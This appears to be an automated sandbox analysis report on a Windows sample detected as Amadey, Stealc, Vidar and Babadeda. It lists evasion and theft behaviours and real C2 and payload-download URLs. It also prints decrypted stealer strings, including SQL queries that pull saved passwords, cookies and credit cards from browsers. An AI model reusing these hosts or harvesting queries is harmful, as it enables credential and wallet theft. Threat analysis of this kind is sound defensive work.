Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1483195
MD5: 45fd30020c12378c242dc90687edc24c
SHA1: 934cd43ff8bd35e77d7df2cbc3aa5d96b672e4bf
SHA256: f4a7d43dc4cdf21cc7a58af7c66386cea1616658f15b996691fbb85a7cb06b9d
Tags: exe
Infos:

Detection

Amadey, Babadeda, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Amadeys stealer DLL
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Babadeda According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php5= Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/ferences.SourceAumide Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpk=U Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/freebl3.dllm$ Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/cost/random.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/softokn3.dllA Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpr( Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/stealc/random.exe395d7f Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.16/cost/random.exe7 Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/002 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpx=$ Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php003002 Avira URL Cloud: Label: phishing
Found malware configuration
Source: 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "85.28.47.31/5499d72b3a3e55be.php"}
Source: 44.2.48f0ec6733.exe.400000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: explorti.exe.7656.19.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: 22
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: 08
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: 20
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: 24
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrcatA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: OpenEventA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateEventA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CloseHandle
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Sleep
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrlenA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ExitProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: user32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateDCA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sscanf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VMwareVMware
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HAL9TH
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: JohnDoe
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DISPLAY
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %hu/%hu/%hu
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: http://85.28.47.31
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: silence
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: /5499d72b3a3e55be.php
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: /8405906461a5200c/
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sila
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalLock
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HeapFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetFileSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Process32Next
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Process32First
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: LocalFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FindClose
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ReadFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: WriteFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CopyFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLastError
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: OpenProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: TerminateProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ole32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: wininet.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: shell32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: psapi.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: rstrtmgr.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SelectObject
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BitBlt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DeleteObject
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipDisposeImage
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetHGlobalFromStream
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CoUninitialize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CoInitialize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CoCreateInstance
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CloseWindow
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: wsprintfA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CharToOemW
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: wsprintfW
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegEnumValueA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CryptBinaryToStringA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetOpenA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: StrStrA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: StrCmpCW
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: PathMatchSpecA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetModuleFileNameExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RmStartSession
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RmRegisterResources
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RmGetList
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RmEndSession
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sqlite3_open
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sqlite3_step
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sqlite3_column_text
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sqlite3_finalize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sqlite3_close
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sqlite3_column_bytes
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sqlite3_column_blob
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: encrypted_key
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: PATH
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: NSS_Init
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: NSS_Shutdown
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: PK11_FreeSlot
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: PK11_Authenticate
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: C:\ProgramData\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: browser:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: profile:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: url:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: login:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: password:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Opera
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: OperaGX
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Network
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: cookies
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: .txt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: TRUE
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FALSE
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: autofill
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: history
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: cc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: name:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: month:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: year:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: card:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Cookies
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Login Data
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Web Data
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: History
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: logins.json
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: formSubmitURL
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: usernameField
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: encryptedUsername
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: encryptedPassword
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: guid
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: cookies.sqlite
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: formhistory.sqlite
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: places.sqlite
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: plugins
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Local Extension Settings
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Sync Extension Settings
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: IndexedDB
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Opera Stable
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Opera GX Stable
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CURRENT
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: chrome-extension_
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Local State
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: profiles.ini
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: chrome
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: opera
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: firefox
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: wallets
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %08lX%04lX%lu
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ProductName
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: x32
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: x64
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ProcessorNameString
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DisplayName
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DisplayVersion
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Network Info:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - IP: IP?
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - Country: ISO?
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: System Summary:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - HWID:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - OS:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - Architecture:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - UserName:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - Computer Name:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - Local Time:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - UTC:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - Language:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - Keyboards:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - Laptop:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - Running Path:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - CPU:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - Threads:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - Cores:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - RAM:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - Display Resolution:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: - GPU:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: User Agents:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Installed Apps:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: All Users:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Current User:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Process List:
